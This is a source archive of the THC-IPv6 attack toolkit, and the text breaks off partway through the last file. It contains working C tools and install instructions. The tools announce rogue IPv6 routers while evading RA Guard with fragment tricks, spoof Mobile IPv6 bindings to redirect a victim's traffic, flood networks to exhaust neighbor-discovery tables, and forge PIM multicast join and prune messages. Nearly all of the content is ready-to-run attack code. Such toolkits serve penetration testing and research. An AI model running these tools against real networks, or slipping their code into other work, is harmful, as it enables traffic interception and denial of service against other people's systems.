thc-ipv6-2.5/0000755000000000000000000000000012257246644011532 5ustar rootrootthc-ipv6-2.5/four2six.c0000644000000000000000000001001712251022437013440 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-FHD] [-s src6] interface ipv6-to-ipv4-gateway ipv4-src ipv4-dst [port]\n\n", prg); printf("Options:\n"); printf(" -F insert atomic fragment header (can be set multiple times)\n"); printf(" -H insert and empty hop-by-hop header\n"); printf(" -D insert a large destination header that fragments the packet\n"); printf(" -s src6 set a specific IPv6 source address\n"); printf("\nSend an IPv4 packet to an IPv6 4to6 gateway. If a port is specified, a UDP packet is sent, otherwise an ICMPv4 ping.\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf2[6], buf3[1500]; unsigned char *gateway6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, offset = 14; char *interface; int src4 = 0, dst4 = 0, port = -1; thc_ipv6_hdr *hdr; if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "DFHs:")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 's': if ((src6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: invalid IPv6 source address specified: %s\n", optarg); } break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 4) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if ((gateway6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } // src ip4, dst ip4 if (inet_aton(argv[optind + 2], (struct in_addr *)&src4) < 0) { fprintf(stderr, "Error: not a valid IPv4 address: %s\n", argv[optind + 2]); exit(-1); } if (inet_aton(argv[optind + 3], (struct in_addr *)&dst4) < 0) { fprintf(stderr, "Error: not a valid IPv4 address: %s\n", argv[optind + 3]); exit(-1); } if (argc - optind > 4) port = atoi(argv[optind + 4]); if ((mac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, gateway6, 0, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_ipv4_rudimentary(pkt1, &pkt1_len, src4, dst4, port) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending IPv4 %s packet from %s to %s via 4to6 gateway %s\n", port == -1 ? "ICMPv4 ping" : "UDPv4", argv[optind + 2], argv[optind + 3], argv[optind + 1]); if (do_dst) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt1, &pkt1_len); } return 0; } thc-ipv6-2.5/INSTALL0000644000000000000000000000061512257246607012564 0ustar rootrootINSTALLATION ============ THC-IPV6 requires libpcap development files being installed, also the libopenssl development files are a good idea. For Debian/Ubunut/Kali/Backtrack, you can install them by: $ sudo apt-get install libpcap-dev libssl-dev To compile simply type $ make All tools are installed to /usr/local/bin if you type $ sudo make install You need to be root to run most tools thc-ipv6-2.5/fake_router26.c0000644000000000000000000004477412251022436014355 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_ENTRIES 16 int plife = 99999, rlife = 4096, llife = 2048, reach = 0, trans = 0, dlife = 4096, cnt, to_send = 256, flags = 0, myoff = 14; char *frbuf, *frbuf2, *frint, buf3[1232]; int frbuflen, frbuf2len, do_overlap = 0, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, prio = 2, interval = 5; unsigned char *frip6, *frmac; thc_ipv6_hdr *frhdr = NULL; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-E type] [-A network/prefix] [-R network/prefix] [-D dns-server] [-s sourceip] [-S sourcemac] [-ardl seconds] [-Tt ms] [-n no] [-i interval] interface [target]\n\n", prg); printf("Options:\n"); printf(" -A network/prefix add autoconfiguration network (up to %d times)\n", MAX_ENTRIES); printf(" -a seconds valid lifetime of prefix -A (defaults to %d)\n", plife); printf(" -R network/prefix add a route entry (up to %d times)\n", MAX_ENTRIES); printf(" -r seconds route entry lifetime of -R (defaults to %d)\n", rlife); printf(" -D dns-server specify a DNS server (up to %d times)\n", MAX_ENTRIES); printf(" -L searchlist specify the DNS domain search list, separate entries with ,\n"); printf(" -d seconds dns entry lifetime of -D (defaults to %d\n", dlife); printf(" -M mtu the MTU to send, defaults to the interface setting\n"); printf(" -s sourceip the source ip of the router, defaults to your link local\n"); printf(" -S sourcemac the source mac of the router, defaults to your interface\n"); printf(" -l seconds router lifetime (defaults to %d)\n", llife); printf(" -T ms reachable timer (defaults to %d)\n", reach); printf(" -t ms retrans timer (defaults to %d)\n", trans); printf(" -p priority priority \"low\", \"medium\", \"high\" (default), \"reserved\"\n"); printf(" -F flags Set one or more of the following flags: managed, other,\n"); printf(" homeagent, proxy, reserved; separate by comma\n"); printf(" -E type Router Advertisement Guard Evasion option. Types: \n"); printf(" H simple hop-by-hop header\n"); printf(" 1 simple one-shot fragmentation header (can add multiple)\n"); printf(" D insert a large destination header so that it fragments\n"); printf(" O overlapping fragments for keep-first targets (Win, BSD, Mac)\n"); printf(" o overlapping fragments for keep-last targets (Linux, Solaris)\n"); printf(" Examples: -E H111, -E D\n"); //, -E O, -E o (the last two are best)\n"); printf(" -m mac-address if only one machine should receive the RAs (not with -E DoO)\n"); printf(" -i interval time between RA packets (default: %d)\n", interval); printf(" -n number number of RAs to send (default: unlimited)\n"); printf("\nAnnounce yourself as a router and try to become the default router.\n"); printf("If a non-existing link-local or mac address is supplied, this results in a DOS.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *pkt = NULL, *dstmac = (unsigned char *) data + 6, *dst = (unsigned char *) data + 14 + 8, *ipv6hdr = (unsigned char *) (data + 14); int pkt_len = 0, i; if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL || header->caplen < 14 + 40 + 2) return; if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0) return; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0) return; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, frbuf, frbuflen, 0) < 0) return; if (do_dst) { thc_generate_pkt(frint, frmac, dstmac, pkt, &pkt_len); frhdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(frint, frip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232); } else { if (thc_generate_and_send_pkt(frint, frmac, dstmac, pkt, &pkt_len) < 0) return; } pkt = thc_destroy_packet(pkt); } int main(int argc, char *argv[]) { char *interface, mac[16] = "", dmac[16] = ""; unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1]; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0; unsigned char *pkt = NULL, *searchlist = NULL; int pkt_len = 0; pcap_t *p; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); memset(rbuf, 0, sizeof(rbuf)); memset(mac, 0, sizeof(mac)); while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) { switch (i) { case 'i': interval = atoi(optarg); break; case 'm': sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); dstmac = dmac; break; case 'S': sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); mac6 = mac; break; case 's': if ((ip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg); exit(-1); } break; case 'M': mtu = atoi(optarg); if (mtu < 0 || mtu > 65535) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu); break; case 'n': to_send = atoi(optarg); if (to_send < 1 || mtu > 255) { fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg); exit(-1); } break; case 'A': if (pcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (size != 64) fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size); if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg); exit(-1); } pbuf[pcnt][0] = size % 256; memcpy((char *) &pbuf[pcnt][1], routerip6, 16); pcnt++; break; case 'a': plife = atoi(optarg); break; case 'r': rlife = atoi(optarg); break; case 'd': dlife = atoi(optarg); break; case 'l': llife = atoi(optarg); break; case 'T': reach = atoi(optarg); break; case 't': trans = atoi(optarg); break; case 'p': if (strncasecmp(optarg, "low", 3) == 0) prio = 0; else if (strncasecmp(optarg, "med", 3) == 0) prio = 1; else if (strncasecmp(optarg, "hi", 2) == 0) prio = 2; else if (strncasecmp(optarg, "res", 3) == 0) prio = 3; else { fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg); exit(-1); } break; case 'R': if (rcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg); exit(-1); } rbuf[rcnt][0] = size % 256; memcpy((char *) &rbuf[rcnt][1], routerip6, 16); rcnt++; break; case 'D': if (dcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES); exit(-1); } if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg); exit(-1); } break; case 'L': searchlist = optarg; break; case 'E': if (optarg == NULL) { fprintf(stderr, "Error: no option type given for -E\n"); exit(-1); } for (j = 0; j < strlen(optarg); j++) { switch (optarg[j]) { // fall through to be fail safe on accidental misuse case '0': // fall through case 'O': do_overlap = 1; break; case 'o': do_overlap = 2; break; case '1': // fall through case 'l': // fall through case 'L': do_frag++; break; case 'h': // fall through case 'H': do_hop = 1; break; case 'd': // fall through case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]); exit(-1); } if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) { fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n"); exit(-1); } } break; case 'F': ptr = strtok(optarg, ","); while (ptr != NULL) { if (strncasecmp(ptr, "man", 3) == 0) flags = (flags | 128); else if (strncasecmp(ptr, "oth", 3) == 0) flags = (flags | 64); else if (strncasecmp(ptr, "hom", 3) == 0) flags = (flags | 32); else if (strncasecmp(ptr, "prox", 4) == 0) flags = (flags | 4); else if (strncasecmp(ptr, "res", 3) == 0) flags = (flags | 2); else if (strncasecmp(ptr, "unk", 3) == 0) flags = (flags | 1); else { fprintf(stderr, "Error: unknown flag: %s\n", ptr); exit(-1); } ptr = strtok(NULL, ","); } break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if ((argc - optind) < 1 || (argc - optind) > 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; interface = argv[optind]; if (argc - optind == 2) if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]); exit(-1); } if (mtu == 0) mtu = thc_get_mtu(interface); if (mac6 == NULL) if ((mac6 = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (ip6 == NULL) if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface); exit(-1); } // if (dns == NULL) // dns = thc_resolve6("ff02::fb"); frint = interface; frip6 = ip6; frmac = mac6; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if (llife > 0xffff) llife = 0xffff; llife = (llife | 0xff000000); if (prio == 2) llife = (llife | 0x00080000); else if (prio == 0) llife = (llife | 0x00180000); else if (prio != 1) llife = (llife | 0x00100000); llife = (llife | (flags << 16)); buf[0] = reach / 16777216; buf[1] = (reach % 16777216) / 65536; buf[2] = (reach % 65536) / 256; buf[3] = reach % 256; buf[4] = trans / 16777216; buf[5] = (trans % 16777216) / 65536; buf[6] = (trans % 65536) / 256; buf[7] = trans % 256; // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; i = 16; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // option prefix, put all in if (pcnt > 0) for (j = 0; j < pcnt; j++) { buf[i++] = 3; buf[i++] = 4; buf[i++] = pbuf[j][0]; // prefix length buf[i++] = 128 + 64; buf[i++] = plife / 16777216; buf[i++] = (plife % 16777216) / 65536; buf[i++] = (plife % 65536) / 256; buf[i++] = plife % 256; buf[i++] = (plife / 2) / 16777216; buf[i++] = ((plife / 2) % 16777216) / 65536; buf[i++] = ((plife / 2) % 65536) / 256; buf[i++] = (plife / 2) % 256; i += 4; // + 4 bytes reserved memcpy(&buf[i], (char *) &pbuf[j][1], 16); i += 16; } // route option, put all in if (rcnt > 0) for (j = 0; j < rcnt; j++) { buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = rbuf[j][0]; // prefix length if (prio == 2) buf[i++] = 0x08; // priority, highest of course else if (prio == 1) buf[i++] = 0x00; else if (prio == 0) buf[i++] = 0x18; else buf[i++] == 0x10; buf[i++] = rlife / 16777216; buf[i++] = (rlife % 16777216) / 65536; buf[i++] = (rlife % 65536) / 256; buf[i++] = rlife % 256; memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network i += 16; } // dns option if (dcnt > 0) for (j = 0; j < dcnt; j++) { buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // reserved buf[i++] = dlife / 16777216; buf[i++] = (dlife % 16777216) / 65536; buf[i++] = (dlife % 65536) / 256; buf[i++] = dlife % 256; memcpy(buf + i, dbuf[j], 16); // dns server i += 16; } // dns searchlist option if (searchlist != NULL) { buf[i] = 31; buf[i + 4] = dlife / 16777216; buf[i + 5] = (dlife % 16777216) / 65536; buf[i + 6] = (dlife % 65536) / 256; buf[i + 7] = dlife % 256; if (searchlist[strlen(searchlist) - 1] == '.') searchlist[strlen(searchlist) - 1] = 0; m = 0; while ((ptr = strstr(searchlist, ".,")) != NULL) { m = strlen(ptr); for (l = 1; l < m; l++) ptr[l - 1] = ptr[l]; ptr[m - 1] = 0; } l = 0; m = 0; j = strlen(searchlist); do { k = 0; ptr = index(&searchlist[l], '.'); if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) { k = 1; ptr = index(&searchlist[l], ','); } if (ptr != NULL) *ptr = 0; n = strlen(&searchlist[l]); buf[i + 8 + m] = n; memcpy(&buf[i + 8 + m + 1], &searchlist[l], n); if (ptr == NULL) l = j; else l += 1 + n; m += 1 + n; if (k || ptr == NULL) m++; // end of domain entry } while (l < j && ptr != NULL); if (m % 8 > 0) m = ( (m / 8) + 1 ) * 8; buf[i + 1] = m/8 + 1; i += m + 8; } frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (j = 0; i < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; //printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap); // init pcap if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Starting to advertise router (Press Control-C to end) ...\n"); while (sent < to_send || to_send > 255) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232); } else if (do_overlap) { if (do_overlap == 1) thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); else thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sent++; if (sent != to_send || to_send > 255) sleep(interval); } return 0; // never reached } thc-ipv6-2.5/fake_mipv6.c0000644000000000000000000000467412251022435013720 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char buf[64]; int buf_len = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface home-address home-agent-address care-of-address\n\n", prg); printf("If the mobile IPv6 home-agent is mis-configured to accept MIPV6 updates without\n"); printf("IPSEC, this will redirect all packets for home-address to care-of-address\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL; unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL; int pkt1_len = 0, rawmode = 0; unsigned int id = 2, i; char *interface; thc_ipv6_hdr *hdr; if (argc < 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; h = thc_resolve6(argv[2]); ha = thc_resolve6(argv[3]); coa = thc_resolve6(argv[4]); if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } for (i = 0; i < 4; i++) { memset(buf, 0, sizeof(buf)); buf[0] = 1; buf[1] = 2; buf[4] = 201; buf[5] = 16; memcpy(&buf[6], h, 16); buf_len = 22; if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL) return -1; hdr = (thc_ipv6_hdr *) pkt1; hdr->original_src = h; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0) return -1; memset(buf, 0, sizeof(buf)); buf[0] = 59; buf[1] = 3; buf[2] = 5; buf[3] = 0; buf[6] = (id % 65536) / 256; buf[7] = id % 256; buf[8] = 192; buf[10] = 0xff; buf[11] = 0xff; buf[12] = 1; buf[14] = 3; buf[15] = 16; memcpy(&buf[16], coa, 16); buf_len = 32; if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0) return -1; thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len); id += 16384; } return 0; } thc-ipv6-2.5/ndpexhaust6.c0000644000000000000000000000677312251022440014140 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s by mario fleischmann \n\n", prg); printf("Syntax: %s interface destination-network [sourceip]\n\n", prg); printf("Randomly pings IPs in target network\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface; int prefer = PREFER_GLOBAL; unsigned char *srcmac; unsigned char *dst6, *src6; unsigned char *ptr; //char dstmac[6] = ""; unsigned char *dstmac = NULL, *tmpmac, *dstnet; int pkt_len = 16; int count = 0; int i; int size, numbytes, samenet = 0; unsigned char *pkt = NULL; unsigned char buf[] = "NDP Exhaustion"; // hardcoded mac /*dstmac[0] = 0x00; dstmac[1] = 0x05; dstmac[2] = 0x73; dstmac[3] = 0xa0; dstmac[4] = 0x00; dstmac[5] = 0x01; */ setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("!\n! Please note: ndpexhaust6 is deprecated, please use ndpexhaust26!\n!\n\n"); if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if ((srcmac = thc_get_own_mac(interface)) == NULL) { printf("Error: invalid interface defined: %s\n", interface); exit(-1); } dstnet = argv[2]; // hier stehts dstnet drin if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); // prefix lenght // printf("Prefix length is %d\n", size); if (size != 64) fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size); numbytes = (128 - size) / 8; // number of bytes to create // printf("Creating %d random adress bytes\n", numbytes); srand(time(NULL) + getpid()); // initalize random number generator dst6 = thc_resolve6(dstnet); // thc_dump_data(dst6, 16, "dst"); if (argc >= 4) src6 = thc_resolve6(argv[3]); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); // thc_dump_data(src6, 16, "src"); dstmac = thc_get_mac(interface, src6, dst6); printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface); while (1) { ++count; for (i = 0; i < numbytes; i++) { dst6[16 - numbytes + i] = rand() % 256; // direct destination manipulation } if (count == 1) { tmpmac = thc_get_mac(interface, src6, dst6); if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0) samenet = 1; } else { if (samenet == 0) { free(dstmac); dstmac = thc_get_mac(interface, src6, dst6); } } // printf("%s\n", ip6adr); // printf("Sending ICMP ECHO to %s\n", ip6adr); if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL) errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n"); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1) errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n"); //thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf)); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) printf("!"); thc_destroy_packet(pkt); usleep(1); if (count % 1000 == 0) printf("."); } } thc-ipv6-2.5/fake_pim6.c0000644000000000000000000000757512251022436013536 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax:\n"); printf(" %s [-t ttl] [-s src6] [-d dst6] interface hello [dr_priority]\n", prg); printf(" %s [-t ttl] [-s src6] [-d dst6] interface join|prune neighbor6 multicast6 target6\n\n", prg); printf("The hello command takes optionally the DR priority (default: 0).\n"); printf("The join and prune commands need the multicast group to modify, the target\naddress that joins or leavs and the neighbor PIM router\n"); printf("Use -s to spoof the source ip6, -d to send to another address than ff02::d,\nand -t to set a different TTL (default: 1)\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[100]; unsigned char *dst6 = NULL, *src6 = NULL, *multicast6, *target6, *neighbor6; int pkt1_len = 0, i = 0; char *interface; int ttl = 1, mode = -1, len = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "t:s:d:")) >= 0) { switch (i) { case 't': ttl = atoi(optarg); break; case 's': src6 = thc_resolve6(optarg); break; case 'd': dst6 = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } interface = argv[optind]; if (strncasecmp(argv[optind + 1], "hello", 3) == 0) mode = 0; if (strncasecmp(argv[optind + 1], "join", 3) == 0) mode = 1; if (strncasecmp(argv[optind + 1], "prune", 3) == 0) { mode = 2; } if (mode == -1) { fprintf(stderr, "Error: no mode defined, specify hello, join or prune\n"); exit(-1); } if (mode != 0) { if (argc - optind != 5) { fprintf(stderr, "Error: join/prune mode need a multicast and target address\n"); exit(-1); } neighbor6 = thc_resolve6(argv[optind + 2]); multicast6 = thc_resolve6(argv[optind + 3]); target6 = thc_resolve6(argv[optind + 4]); if (multicast6 == NULL || target6 == NULL || neighbor6 == NULL) { fprintf(stderr, "Error: unable to resolve addresses\n"); exit(-1); } } if (dst6 == NULL) dst6 = thc_resolve6("ff02::d"); if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); // here we set buf and len switch(mode) { case 0: buf[1] = 1; buf[3] = 2; buf[5] = 255; buf[7] = 19; buf[9] = 4; if (argc - optind >= 3) { i = atoi(argv[optind + 2]); buf[10] = i / 256*256*256; buf[11] = (i / 65536) % 256; buf[12] = (i % 65536) / 256; buf[13] = i % 256; } len = 14; break; default: buf[0] = 2; memcpy(buf + 2, neighbor6, 16); buf[19] = 1; buf[21] = 255; buf[22] = 2; buf[25] = 128; memcpy(buf + 26, multicast6, 16); if (mode == 1) buf[43] = 1; else buf[45] = 1; buf[46] = 2; buf[48] = 7; buf[49] = 128; memcpy(buf + 50, target6, 16); len = 66; mode = 3; } if (thc_add_pim(pkt1, &pkt1_len, mode, buf, len) < 0) return -1; if (thc_generate_pkt(interface, NULL, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate 